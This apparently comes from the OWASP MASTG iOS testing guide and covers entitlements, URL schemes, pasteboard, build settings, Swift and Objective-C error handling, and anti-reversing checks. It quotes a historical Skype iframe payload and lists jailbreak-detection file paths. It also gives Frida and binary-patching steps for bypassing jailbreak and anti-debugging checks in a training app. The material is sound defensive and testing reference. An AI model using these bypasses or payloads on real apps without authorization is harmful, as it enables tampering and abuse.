<key>Entitlements</key>\n<dict>\n ...\n <key>com.apple.developer.default-data-protection</key>\n <string>NSFileProtectionComplete</string>\n</dict>\n
For other capabilities such as HealthKit, the user has to be asked for permission, therefore it is not enough to add the entitlements, special keys and strings have to be added to the Info.plist
file of the app.
Purpose strings or_usage description strings_ are custom texts that are offered to users in the system's permission request alert when requesting permission to access protected data or resources.
If linking on or after iOS 10, developers are required to include purpose strings in their app's Info.plist
file. Otherwise, if the app attempts to access protected data or resources without having provided the corresponding purpose string, the access will fail and the app might even crash.
For an overview of the different purpose strings Info.plist keys available see Table 1-2 at the Apple App Programming Guide for iOS. Click on the provided links to see the full description of each key in the CocoaKeys reference.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#code-signing-entitlements-file","title":"Code Signing Entitlements File","text":"Certain capabilities require a code signing entitlements file (<appname>.entitlements
). It is automatically generated by Xcode but may be manually edited and/or extended by the developer as well.
Here is an example of entitlements file of the open source app Telegram including the App Groups entitlement (application-groups
):
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n...\n <key>com.apple.security.application-groups</key>\n <array>\n <string>group.ph.telegra.Telegraph</string>\n </array>\n</dict>\n...\n</plist>\n
The entitlement outlined above does not require any additional permissions from the user. However, it is always a good practice to check all entitlements, as the app might overask the user in terms of permissions and thereby leak information.
As documented at Apple Developer Documentation, the App Groups entitlement is required to share information between different apps through IPC or a shared file container, which means that data can be shared on the device directly between the apps. This entitlement is also required if an app extension requires to share information with its containing app.
Depending on the data to-be-shared it might be more appropriate to share it using another method such as through a backend where this data could be potentially verified, avoiding tampering by e.g. the user themselves.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#inter-process-communication-ipc","title":"Inter-Process Communication (IPC)","text":"During implementation of a mobile application, developers may apply traditional techniques for IPC (such as using shared files or network sockets). The IPC system functionality offered by mobile application platforms should be used because it is much more mature than traditional techniques. Using IPC mechanisms with no security in mind may cause the application to leak or expose sensitive data.
In contrast to Android's rich Inter-Process Communication (IPC) capability, iOS offers some rather limited options for communication between apps. In fact, there's no way for apps to communicate directly. In this section we will present the different types of indirect communication offered by iOS and how to test them. Here's an overview:
Custom URL schemes allow apps to communicate via a custom protocol. An app must declare support for the schemes and handle incoming URLs that use those schemes.
Apple warns about the improper use of custom URL schemes in the Apple Developer Documentation:
URL schemes offer a potential attack vector into your app, so make sure to validate all URL parameters and discard any malformed URLs. In addition, limit the available actions to those that do not risk the user\u2019s data. For example, do not allow other apps to directly delete content or access sensitive information about the user. When testing your URL-handling code, make sure your test cases include improperly formatted URLs.
They also suggest using universal links instead, if the purpose is to implement deep linking:
While custom URL schemes are an acceptable form of deep linking, universal links are strongly recommended as a best practice.
Supporting a custom URL scheme is done by:
Security issues arise when an app processes calls to its URL scheme without properly validating the URL and its parameters and when users aren't prompted for confirmation before triggering an important action.
One example is the following bug in the Skype Mobile app, discovered in 2010: The Skype app registered the skype://
protocol handler, which allowed other apps to trigger calls to other Skype users and phone numbers. Unfortunately, Skype didn't ask users for permission before placing the calls, so any app could call arbitrary numbers without the user's knowledge. Attackers exploited this vulnerability by putting an invisible <iframe src=\"skype://xxx?call\"></iframe>
(where xxx
was replaced by a premium number), so any Skype user who inadvertently visited a malicious website called the premium number.
As a developer, you should carefully validate any URL before calling it. You can allow only certain applications which may be opened via the registered protocol handler. Prompting users to confirm the URL-invoked action is another helpful control.
All URLs are passed to the app delegate, either at launch time or while the app is running or in the background. To handle incoming URLs, the delegate should implement methods to:
More information can be found in the archived App Programming Guide for iOS and in the Apple Secure Coding Guide.
In addition, an app may also want to send URL requests (aka. queries) to other apps. This is done by:
Universal links are the iOS equivalent to Android App Links (aka. Digital Asset Links) and are used for deep linking. When tapping a universal link (to the app's website), the user will seamlessly be redirected to the corresponding installed app without going through Safari. If the app isn\u2019t installed, the link will open in Safari.
Universal links are standard web links (HTTP/HTTPS) and are not to be confused with custom URL schemes, which originally were also used for deep linking.
For example, the Telegram app supports both custom URL schemes and universal links:
tg://resolve?domain=fridadotre
is a custom URL scheme and uses the tg://
scheme.https://telegram.me/fridadotre
is a universal link and uses the https://
scheme.Both result in the same action, the user will be redirected to the specified chat in Telegram (\"fridadotre\" in this case). However, universal links give several key benefits that are not applicable when using custom URL schemes and are the recommended way to implement deep linking, according to the Apple Developer Documentation. Specifically, universal links are:
You can learn more about Universal Links in the post \"Learning about Universal Links and Fuzzing URL Schemes on iOS with Frida\" by Carlos Holguera.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#uiactivity-sharing","title":"UIActivity Sharing","text":"Starting on iOS 6 it is possible for third-party apps to share data (items) via specific mechanisms like AirDrop, for example. From a user perspective, this feature is the well-known system-wide \"Share Activity Sheet\" that appears after clicking on the \"Share\" button.
The available built-in sharing mechanisms (aka. Activity Types) include:
A full list can be found in UIActivity.ActivityType. If not considered appropriate for the app, the developers have the possibility to exclude some of these sharing mechanisms.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#app-extensions","title":"App extensions","text":"Together with iOS 8, Apple introduced App Extensions. According to Apple App Extension Programming Guide, app extensions let apps offer custom functionality and content to users while they\u2019re interacting with other apps or the system. In order to do this, they implement specific, well scoped tasks like, for example, define what happens after the user clicks on the \"Share\" button and selects some app or action, provide the content for a Today widget or enable a custom keyboard.
Depending on the task, the app extension will have a particular type (and only one), the so-called extension points. Some notable ones are:
There are three important elements here:
For example, the user selects text in the host app, clicks on the \"Share\" button and selects one \"app\" or action from the list. This triggers the app extension of the containing app. The app extension displays its view within the context of the host app and uses the items provided by the host app, the selected text in this case, to perform a specific task (post it on a social network, for example). See this picture from the Apple App Extension Programming Guide which pretty good summarizes this:
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#security-considerations","title":"Security Considerations","text":"From the security point of view it is important to note that:
openURL:completionHandler:
method of the NSExtensionContext
class.In addition:
When typing data into input fields, the clipboard can be used to copy in data. The clipboard is accessible system-wide and is therefore shared by apps. This sharing can be misused by malicious apps to get sensitive data that has been stored in the clipboard.
When using an app you should be aware that other apps might be reading the clipboard continuously, as the Facebook app did. Before iOS 9, a malicious app might monitor the pasteboard in the background while periodically retrieving [UIPasteboard generalPasteboard].string
. As of iOS 9, pasteboard content is accessible to apps in the foreground only, which reduces the attack surface of password sniffing from the clipboard dramatically. Still, copy-pasting passwords is a security risk you should be aware of, but also cannot be solved by an app.
The UIPasteboard
enables sharing data within an app, and from an app to other apps. There are two kinds of pasteboards:
Security Considerations:
Code signing your app assures users that the app has a known source and hasn't been modified since it was last signed. Before your app can integrate app services, be installed on a non-jailbroken device, or be submitted to the App Store, it must be signed with a certificate issued by Apple. For more information on how to request certificates and code sign your apps, review the App Distribution Guide.
"},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#third-party-libraries","title":"Third-Party Libraries","text":"iOS applications often make use of third party libraries which accelerate development as the developer has to write less code in order to solve a problem. However, third party libraries may contain vulnerabilities, incompatible licensing, or malicious content. Additionally, it is difficult for organizations and developers to manage application dependencies, including monitoring library releases and applying available security patches.
There are three widely used package management tools Swift Package Manager, Carthage, and CocoaPods:
There are two categories of libraries:
OHHTTPStubs
used for testing.Alamofire
.These libraries can lead to unwanted side-effects:
AFNetworking
version 2.5.1, which contained a bug that disabled certificate validation. This vulnerability would allow attackers to execute man-in-the-middle attacks against apps that are using the library to connect to their APIs.Please note that this issue can hold on multiple levels: When you use webviews with JavaScript running in the webview, the JavaScript libraries can have these issues as well. The same holds for plugins/libraries for Cordova, React-native and Xamarin apps.
"},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#memory-corruption-bugs","title":"Memory Corruption Bugs","text":"iOS applications have various ways to run into memory corruption bugs: first there are the native code issues which have been mentioned in the general Memory Corruption Bugs section. Next, there are various unsafe operations with both Objective-C and Swift to actually wrap around native code which can create issues. Last, both Swift and Objective-C implementations can result in memory leaks due to retaining objects which are no longer in use.
Learn more:
Detecting the presence of binary protection mechanisms heavily depend on the language used for developing the application.
Although Xcode enables all binary security features by default, it may be relevant to verify this for old applications or to check for compiler flag misconfigurations. The following features are applicable:
MH_EXECUTE
).MH_DYLIB
).Learn more:
Tests to detect the presence of these protection mechanisms heavily depend on the language used for developing the application. For example, existing techniques for detecting the presence of stack canaries do not work for pure Swift apps.
"},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#xcode-project-settings","title":"Xcode Project Settings","text":""},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#stack-canary-protection","title":"Stack Canary protection","text":"Steps for enabling stack canary protection in an iOS application:
Steps for building an iOS application as PIE:
ARC is automatically enabled for Swift apps by the swiftc
compiler. However, for Objective-C apps you'll have ensure that it's enabled by following these steps:
See the Technical Q&A QA1788 Building a Position Independent Executable.
"},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#debuggable-apps","title":"Debuggable Apps","text":"Apps can be made debuggable by adding the get-task-allow
key to the app entitlements file and setting it to true
.
While debugging is a useful feature when developing an app, it has to be turned off before releasing apps to the App Store or within an enterprise program. To do that you need to determine the mode in which your app is to be generated to check the flags in the environment:
As a good practice, as little explanatory information as possible should be provided with a compiled binary. The presence of additional metadata such as debug symbols might provide valuable information about the code, e.g. function names leaking information about what a function does. This metadata is not required to execute the binary and thus it is safe to discard it for the release build, which can be done by using proper compiler configurations. As a tester you should inspect all binaries delivered with the app and ensure that no debugging symbols are present (at least those revealing any valuable information about the code).
When an iOS application is compiled, the compiler generates a list of debug symbols for each binary file in an app (the main app executable, frameworks, and app extensions). These symbols include class names, global variables, and method and function names which are mapped to specific files and line numbers where they're defined. Debug builds of an app place the debug symbols in a compiled binary by default, while release builds of an app place them in a companion Debug Symbol file (dSYM) to reduce the size of the distributed app.
"},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#debugging-code-and-error-logging","title":"Debugging Code and Error Logging","text":"To speed up verification and get a better understanding of errors, developers often include debugging code, such as verbose logging statements (using NSLog
, println
, print
, dump
, and debugPrint
) about responses from their APIs and about their application's progress and/or state. Furthermore, there may be debugging code for \"management-functionality\", which is used by developers to set the application's state or mock responses from an API. Reverse engineers can easily use this information to track what's happening with the application. Therefore, debugging code should be removed from the application's release version.
Exceptions often occur after an application enters an abnormal or erroneous state. Testing exception handling is about making sure that the application will handle the exception and get into a safe state without exposing any sensitive information via its logging mechanisms or the UI.
Bear in mind that exception handling in Objective-C is quite different from exception handling in Swift. Bridging the two approaches in an application that is written in both legacy Objective-C code and Swift code can be problematic.
"},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#exception-handling-in-objective-c","title":"Exception Handling in Objective-C","text":"Objective-C has two types of errors:
NSException:
NSException
is used to handle programming and low-level errors (e.g., division by 0 and out-of-bounds array access). An NSException
can either be raised by raise
or thrown with @throw
. Unless caught, this exception will invoke the unhandled exception handler, with which you can log the statement (logging will halt the program). @catch
allows you to recover from the exception if you're using a @try
-@catch
-block:
@try {\n //do work here\n }\n\n@catch (NSException *e) {\n //recover from exception\n}\n\n@finally {\n //cleanup\n
Bear in mind that using NSException
comes with memory management pitfalls: you need to clean up allocations from the try block that are in the finally block. Note that you can promote NSException
objects to NSError
by instantiating an NSError
in the @catch
block.
NSError:
NSError
is used for all other types of errors. Some Cocoa framework APIs provide errors as objects in their failure callback in case something goes wrong; those that don't provide them pass a pointer to an NSError
object by reference. It is a good practice to provide a BOOL
return type to the method that takes a pointer to an NSError
object to indicate success or failure. If there's a return type, make sure to return nil
for errors. If NO
or nil
is returned, it allows you to inspect the error/reason for failure.
Exception handing in Swift (2 - 5) is quite different. The try-catch block is not there to handle NSException
. The block is used to handle errors that conform to the Error
(Swift 3) or ErrorType
(Swift 2) protocol. This can be challenging when Objective-C and Swift code are combined in an application. Therefore, NSError
is preferable to NSException
for programs written in both languages. Furthermore, error-handling is opt-in in Objective-C, but throws
must be explicitly handled in Swift. To convert error-throwing, look at the Apple documentation. Methods that can throw errors use the throws
keyword. The Result
type represents a success or failure, see Result, How to use Result in Swift 5 and The power of Result types in Swift. There are four ways to handle errors in Swift:
do-catch
; there's only a throw
throwing the actual error or a try
to execute the method that throws. The method containing the try
also requires the throws
keyword:func dosomething(argumentx:TypeX) throws {\n try functionThatThrows(argumentx: argumentx)\n}\n
do-catch
statement. You can use the following pattern:func doTryExample() {\n do {\n try functionThatThrows(number: 203)\n } catch NumberError.lessThanZero {\n // Handle number is less than zero\n } catch let NumberError.tooLarge(delta) {\n // Handle number is too large (with delta value)\n } catch {\n // Handle any other errors\n }\n}\n\nenum NumberError: Error {\n case lessThanZero\n case tooLarge(Int)\n case tooSmall(Int)\n}\n\nfunc functionThatThrows(number: Int) throws -> Bool {\n if number < 0 {\n throw NumberError.lessThanZero\n } else if number < 10 {\n throw NumberError.tooSmall(10 - number)\n } else if number > 100 {\n throw NumberError.tooLarge(100 - number)\n } else {\n return true\n }\n}\n
let x = try? functionThatThrows()\n // In this case the value of x is nil in case of an error.\n
try!
expression to assert that the error won't occur.Result
return:enum ErrorType: Error {\n case typeOne\n case typeTwo\n}\n\nfunc functionWithResult(param: String?) -> Result<String, ErrorType> {\n guard let value = param else {\n return .failure(.typeOne)\n }\n return .success(value)\n}\n\nfunc callResultFunction() {\n let result = functionWithResult(param: \"OWASP\")\n\n switch result {\n case let .success(value):\n // Handle success\n case let .failure(error):\n // Handle failure (with error)\n }\n}\n
Result
type:struct MSTG: Codable {\n var root: String\n var plugins: [String]\n var structure: MSTGStructure\n var title: String\n var language: String\n var description: String\n}\n\nstruct MSTGStructure: Codable {\n var readme: String\n}\n\nenum RequestError: Error {\n case requestError(Error)\n case noData\n case jsonError\n}\n\nfunc getMSTGInfo() {\n guard let url = URL(string: \"https://raw.githubusercontent.com/OWASP/owasp-mastg/master/book.json\") else {\n return\n }\n\n request(url: url) { result in\n switch result {\n case let .success(data):\n // Handle success with MSTG data\n let mstgTitle = data.title\n let mstgDescription = data.description\n case let .failure(error):\n // Handle failure\n switch error {\n case let .requestError(error):\n // Handle request error (with error)\n case .noData:\n // Handle no data received in response\n case .jsonError:\n // Handle error parsing JSON\n }\n }\n }\n}\n\nfunc request(url: URL, completion: @escaping (Result<MSTG, RequestError>) -> Void) {\n let task = URLSession.shared.dataTask(with: url) { data, _, error in\n if let error = error {\n return completion(.failure(.requestError(error)))\n } else {\n if let data = data {\n let decoder = JSONDecoder()\n guard let response = try? decoder.decode(MSTG.self, from: data) else {\n return completion(.failure(.jsonError))\n }\n return completion(.success(response))\n }\n }\n }\n task.resume()\n}\n
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/","title":"iOS Anti-Reversing Defenses","text":""},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#overview","title":"Overview","text":"This chapter covers defense-in-depth measures recommended for apps that process, or give access to, sensitive data or functionality. Research shows that many App Store apps often include these measures.
These measures should be applied as needed, based on an assessment of the risks caused by unauthorized tampering with the app and/or reverse engineering of the code.
You can learn more about principles and technical risks of reverse engineering and code modification in these OWASP documents:
The lack of any of these measures does not cause a vulnerability - instead, they are meant to increase the app's resilience against reverse engineering and specific client-side attacks.
None of these measures can assure a 100% effectiveness, as the reverse engineer will always have full access to the device and will therefore always win (given enough time and resources)!
For example, preventing debugging is virtually impossible. If the app is publicly available, it can be run on an untrusted device that is under full control of the attacker. A very determined attacker will eventually manage to bypass all the app's anti-debugging controls by patching the app binary or by dynamically modifying the app's behavior at runtime with tools such as Frida.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#jailbreak-detection","title":"Jailbreak Detection","text":"Jailbreak detection mechanisms are added to reverse engineering defense to make running the app on a jailbroken device more difficult. This blocks some of the tools and techniques reverse engineers like to use. Like most other types of defense, jailbreak detection is not very effective by itself, but scattering checks throughout the app's source code can improve the effectiveness of the overall anti-tampering scheme.
You can learn more about Jailbreak/Root Detection in the research study \"Jailbreak/Root Detection Evasion Study on iOS and Android\" by Dana Geist and Marat Nigmatullin.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#common-jailbreak-detection-checks","title":"Common Jailbreak Detection Checks","text":"Here we present three typical jailbreak detection techniques:
File-based Checks:
The app might be checking for files and directories typically associated with jailbreaks, such as:
/Applications/Cydia.app\n/Applications/FakeCarrier.app\n/Applications/Icy.app\n/Applications/IntelliScreen.app\n/Applications/MxTube.app\n/Applications/RockApp.app\n/Applications/SBSettings.app\n/Applications/WinterBoard.app\n/Applications/blackra1n.app\n/Library/MobileSubstrate/DynamicLibraries/LiveClock.plist\n/Library/MobileSubstrate/DynamicLibraries/Veency.plist\n/Library/MobileSubstrate/MobileSubstrate.dylib\n/System/Library/LaunchDaemons/com.ikey.bbot.plist\n/System/Library/LaunchDaemons/com.saurik.Cydia.Startup.plist\n/bin/bash\n/bin/sh\n/etc/apt\n/etc/ssh/sshd_config\n/private/var/lib/apt\n/private/var/lib/cydia\n/private/var/mobile/Library/SBSettings/Themes\n/private/var/stash\n/private/var/tmp/cydia.log\n/var/tmp/cydia.log\n/usr/bin/sshd\n/usr/libexec/sftp-server\n/usr/libexec/ssh-keysign\n/usr/sbin/sshd\n/var/cache/apt\n/var/lib/apt\n/var/lib/cydia\n/usr/sbin/frida-server\n/usr/bin/cycript\n/usr/local/bin/cycript\n/usr/lib/libcycript.dylib\n/var/log/syslog\n
Checking File Permissions:
The app might be trying to write to a location that's outside the application's sandbox. For instance, it may attempt to create a file in, for example, the /private
directory. If the file is created successfully, the app can assume that the device has been jailbroken.
do {\n let pathToFileInRestrictedDirectory = \"/private/jailbreak.txt\"\n try \"This is a test.\".write(toFile: pathToFileInRestrictedDirectory, atomically: true, encoding: String.Encoding.utf8)\n try FileManager.default.removeItem(atPath: pathToFileInRestrictedDirectory)\n // Device is jailbroken\n} catch {\n // Device is not jailbroken\n}\n
Checking Protocol Handlers:
The app might be attempting to call well-known protocol handlers such as cydia://
(available by default after installing Cydia).
if let url = URL(string: \"cydia://package/com.example.package\"), UIApplication.shared.canOpenURL(url) {\n // Device is jailbroken\n}\n
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#automated-jailbreak-detection-bypass","title":"Automated Jailbreak Detection Bypass","text":"The quickest way to bypass common Jailbreak detection mechanisms is objection. You can find the implementation of the jailbreak bypass in the jailbreak.ts script.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#manual-jailbreak-detection-bypass","title":"Manual Jailbreak Detection Bypass","text":"If the automated bypasses aren't effective you need to get your hands dirty and reverse engineer the app binaries until you find the pieces of code responsible for the detection and either patch them statically or apply runtime hooks to disable them.
Step 1: Reverse Engineering:
When you need to reverse engineer a binary looking for jailbreak detection, the most obvious way is to search for known strings, such as \"jail\" or \"jailbreak\". Note that this won't be always effective, especially when resilience measures are in place or simply when the the developer has avoided such obvious terms.
Example: Download the Damn Vulnerable iOS application (DVIA-v2), unzip it, load the main binary into radare2 and wait for the analysis to complete.
r2 -A ./DVIA-v2-swift/Payload/DVIA-v2.app/DVIA-v2\n
Now you can list the binary's symbols using the is
command and apply a case-insensitive grep (~+
) for the string \"jail\".
[0x1001a9790]> is~+jail\n...\n2230 0x001949a8 0x1001949a8 GLOBAL FUNC 0 DVIA_v2.JailbreakDetectionViewController.isJailbroken.allocator__Bool\n7792 0x0016d2d8 0x10016d2d8 LOCAL FUNC 0 +[JailbreakDetection isJailbroken]\n...\n
As you can see, there's an instance method with the signature -[JailbreakDetectionVC isJailbroken]
.
Step 2: Dynamic Hooks:
Now you can use Frida to bypass jailbreak detection by performing the so-called early instrumentation, that is, by replacing function implementation right at startup.
Use frida-trace
on your host computer:
frida-trace -U -f /Applications/DamnVulnerableIOSApp.app/DamnVulnerableIOSApp -m \"-[JailbreakDetectionVC isJailbroken]\"\n
This will start the app, trace calls to -[JailbreakDetectionVC isJailbroken]
, and create a JavaScript hook for each matching element. Open ./__handlers__/__JailbreakDetectionVC_isJailbroken_.js
with your favouritte editor and edit the onLeave
callback function. You can simply replace the return value using retval.replace()
to always return 0
:
onLeave: function (log, retval, state) {\n console.log(\"Function [JailbreakDetectionVC isJailbroken] originally returned:\"+ retval);\n retval.replace(0); \n console.log(\"Changing the return value to:\"+retval);\n}\n
This will provide the following output:
$ frida-trace -U -f /Applications/DamnVulnerableIOSApp.app/DamnVulnerableIOSApp -m \"-[JailbreakDetectionVC isJailbroken]:\"\n\nInstrumenting functions... `...\n-[JailbreakDetectionVC isJailbroken]: Loaded handler at \"./__handlers__/__JailbreakDetectionVC_isJailbroken_.js\"\nStarted tracing 1 function. Press Ctrl+C to stop.\n\nFunction [JailbreakDetectionVC isJailbroken] originally returned:0x1\nChanging the return value to:0x0\n
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#anti-debugging-detection","title":"Anti-Debugging Detection","text":"Exploring applications using a debugger is a very powerful technique during reversing. You can not only track variables containing sensitive data and modify the control flow of the application, but also read and modify memory and registers.
There are several anti-debugging techniques applicable to iOS which can be categorized as preventive or as reactive. When properly distributed throughout the app, these techniques act as a supportive measure to increase the overall resilience.
As seen in chapter \"Tampering and Reverse Engineering on iOS\", the iOS XNU kernel implements a ptrace
system call that's lacking most of the functionality required to properly debug a process (e.g. it allows attaching/stepping but not read/write of memory and registers).
Nevertheless, the iOS implementation of the ptrace
syscall contains a nonstandard and very useful feature: preventing the debugging of processes. This feature is implemented as the PT_DENY_ATTACH
request, as described in the official BSD System Calls Manual. In simple words, it ensures that no other debugger can attach to the calling process; if a debugger attempts to attach, the process will terminate. Using PT_DENY_ATTACH
is a fairly well-known anti-debugging technique, so you may encounter it often during iOS pentests.
Before diving into the details, it is important to know that ptrace
is not part of the public iOS API. Non-public APIs are prohibited, and the App Store may reject apps that include them. Because of this, ptrace
is not directly called in the code; it's called when a ptrace
function pointer is obtained via dlsym
.
The following is an example implementation of the above logic:
#import <dlfcn.h>\n#import <sys/types.h>\n#import <stdio.h>\ntypedef int (*ptrace_ptr_t)(int _request, pid_t _pid, caddr_t _addr, int _data);\nvoid anti_debug() {\n ptrace_ptr_t ptrace_ptr = (ptrace_ptr_t)dlsym(RTLD_SELF, \"ptrace\");\n ptrace_ptr(31, 0, 0, 0); // PTRACE_DENY_ATTACH = 31\n}\n
Bypass: To demonstrate how to bypass this technique we'll use an example of a disassembled binary that implements this approach:
Let's break down what's happening in the binary. dlsym
is called with ptrace
as the second argument (register R1). The return value in register R0 is moved to register R6 at offset 0x1908A. At offset 0x19098, the pointer value in register R6 is called using the BLX R6 instruction. To disable the ptrace
call, we need to replace the instruction BLX R6
(0xB0 0x47
in Little Endian) with the NOP
(0x00 0xBF
in Little Endian) instruction. After patching, the code will be similar to the following:
Armconverter.com is a handy tool for conversion between bytecode and instruction mnemonics.
Bypasses for other ptrace-based anti-debugging techniques can be found in \"Defeating Anti-Debug Techniques: macOS ptrace variants\" by Alexander O'Mara.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#using-sysctl","title":"Using sysctl","text":"Another approach to detecting a debugger that's attached to the calling process involves sysctl
. According to the Apple documentation, it allows processes to set system information (if having the appropriate privileges) or simply to retrieve system information (such as whether or not the process is being debugged). However, note that just the fact that an app uses sysctl
might be an indicator of anti-debugging controls, though this won't be always be the case.
The Apple Documentation Archive includes an example which checks the info.kp_proc.p_flag
flag returned by the call to sysctl
with the appropriate parameters. According to Apple, you shouldn't use this code unless it's for the debug build of your program.
Bypass: One way to bypass this check is by patching the binary. When the code above is compiled, the disassembled version of the second half of the code is similar to the following:
After the instruction at offset 0xC13C, MOVNE R0, #1
is patched and changed to MOVNE R0, #0
(0x00 0x20 in in bytecode), the patched code is similar to the following:
You can also bypass a sysctl
check by using the debugger itself and setting a breakpoint at the call to sysctl
. This approach is demonstrated in iOS Anti-Debugging Protections #2.
Applications on iOS can detect if they have been started by a debugger by checking their parent PID. Normally, an application is started by the launchd process, which is the first process running in the user mode and has PID=1. However, if a debugger starts an application, we can observe that getppid
returns a PID different than 1
. This detection technique can be implemented in native code (via syscalls), using Objective-C or Swift as shown here:
func AmIBeingDebugged() -> Bool {\n return getppid() != 1\n}\n
Bypass: Similarly to the other techniques, this has also a trivial bypass (e.g. by patching the binary or by using Frida hooks).
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#file-integrity-checks","title":"File Integrity Checks","text":"There are two common approaches to check file integrity: using application source code integrity checks and using file storage integrity checks.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#application-source-code-integrity-checks","title":"Application Source Code Integrity Checks","text":"In the \"Tampering and Reverse Engineering on iOS\" chapter, we discussed the iOS IPA application signature check. We also saw that determined reverse engineers can bypass this check by re-packaging and re-signing an app using a developer or enterprise certificate. One way to make this harder is to add a custom check that determines whether the signatures still match at runtime.
Apple takes care of integrity checks with DRM. However, additional controls (such as in the example below) are possible. The mach_header
is parsed to calculate the start of the instruction data, which is used to generate the signature. Next, the signature is compared to the given signature. Make sure that the generated signature is stored or coded somewhere else.
int xyz(char *dst) {\n const struct mach_header * header;\n Dl_info dlinfo;\n\n if (dladdr(xyz, &dlinfo) == 0 || dlinfo.dli_fbase == NULL) {\n NSLog(@\" Error: Could not resolve symbol xyz\");\n [NSThread exit];\n }\n\n while(1) {\n\n header = dlinfo.dli_fbase; // Pointer on the Mach-O header\n struct load_command * cmd = (struct load_command *)(header + 1); // First load command\n // Now iterate through load command\n //to find __text section of __TEXT segment\n for (uint32_t i = 0; cmd != NULL && i < header->ncmds; i++) {\n if (cmd->cmd == LC_SEGMENT) {\n // __TEXT load command is a LC_SEGMENT load command\n struct segment_command * segment = (struct segment_command *)cmd;\n if (!strcmp(segment->segname, \"__TEXT\")) {\n // Stop on __TEXT segment load command and go through sections\n // to find __text section\n struct section * section = (struct section *)(segment + 1);\n for (uint32_t j = 0; section != NULL && j < segment->nsects; j++) {\n if (!strcmp(section->sectname, \"__text\"))\n break; //Stop on __text section load command\n section = (struct section *)(section + 1);\n }\n // Get here the __text section address, the __text section size\n // and the virtual memory address so we can calculate\n // a pointer on the __text section\n uint32_t * textSectionAddr = (uint32_t *)section->addr;\n uint32_t textSectionSize = section->size;\n uint32_t * vmaddr = segment->vmaddr;\n char * textSectionPtr = (char *)((int)header + (int)textSectionAddr - (int)vmaddr);\n // Calculate the signature of the data,\n // store the result in a string\n // and compare to the original one\n unsigned char digest[CC_MD5_DIGEST_LENGTH];\n CC_MD5(textSectionPtr, textSectionSize, digest); // calculate the signature\n for (int i = 0; i < sizeof(digest); i++) // fill signature\n sprintf(dst + (2 * i), \"%02x\", digest[i]);\n\n // return strcmp(originalSignature, signature) == 0; // verify signatures match\n\n return 0;\n }\n }\n cmd = (struct load_command *)((uint8_t *)cmd + cmd->cmdsize);\n }\n }\n\n}\n
Bypass:
Apps might choose to ensure the integrity of the application storage itself, by creating an HMAC or signature over either a given key-value pair or a file stored on the device, e.g. in the Keychain, UserDefaults
/NSUserDefaults
, or any database.
For example, an app might contain the following code to generate an HMAC with CommonCrypto
:
// Allocate a buffer to hold the digest and perform the digest.\n NSMutableData* actualData = [getData];\n //get the key from the keychain\n NSData* key = [getKey];\n NSMutableData* digestBuffer = [NSMutableData dataWithLength:CC_SHA256_DIGEST_LENGTH];\n CCHmac(kCCHmacAlgSHA256, [actualData bytes], (CC_LONG)[key length], [actualData bytes], (CC_LONG)[actualData length], [digestBuffer mutableBytes]);\n [actualData appendData: digestBuffer];\n
This script performs the following steps:
NSMutableData
.After that, it might be verifying the HMACs by doing the following:
NSData* hmac = [data subdataWithRange:NSMakeRange(data.length - CC_SHA256_DIGEST_LENGTH, CC_SHA256_DIGEST_LENGTH)];\n NSData* actualData = [data subdataWithRange:NSMakeRange(0, (data.length - hmac.length))];\n NSMutableData* digestBuffer = [NSMutableData dataWithLength:CC_SHA256_DIGEST_LENGTH];\n CCHmac(kCCHmacAlgSHA256, [actualData bytes], (CC_LONG)[key length], [actualData bytes], (CC_LONG)[actualData length], [digestBuffer mutableBytes]);\n return [hmac isEqual: digestBuffer];\n
NSData
.NSData
.Note: if the app also encrypts files, make sure that it encrypts and then calculates the HMAC as described in Authenticated Encryption.
Bypass:
The presence of tools, frameworks and apps commonly used by reverse engineers may indicate an attempt to reverse engineer the app. Some of these tools can only run on a jailbroken device, while others force the app into debugging mode or depend on starting a background service on the mobile phone. Therefore, there are different ways that an app may implement to detect a reverse engineering attack and react to it, e.g. by terminating itself.
You can detect popular reverse engineering tools that have been installed in an unmodified form by looking for associated application packages, files, processes, or other tool-specific modifications and artifacts. In the following examples, we'll discuss different ways to detect the Frida instrumentation framework, which is used extensively in this guide and also in the real world. Other tools, such as Cydia Substrate or Cycript, can be detected similarly. Note that injection, hooking and DBI (Dynamic Binary Instrumentation) tools can often be detected implicitly, through runtime integrity checks, which are discussed below.
Bypass:
The following steps should guide you when bypassing detection of reverse engineering tools:
Refer to the chapter \"Tampering and Reverse Engineering on iOS\" for examples of patching and code injection.
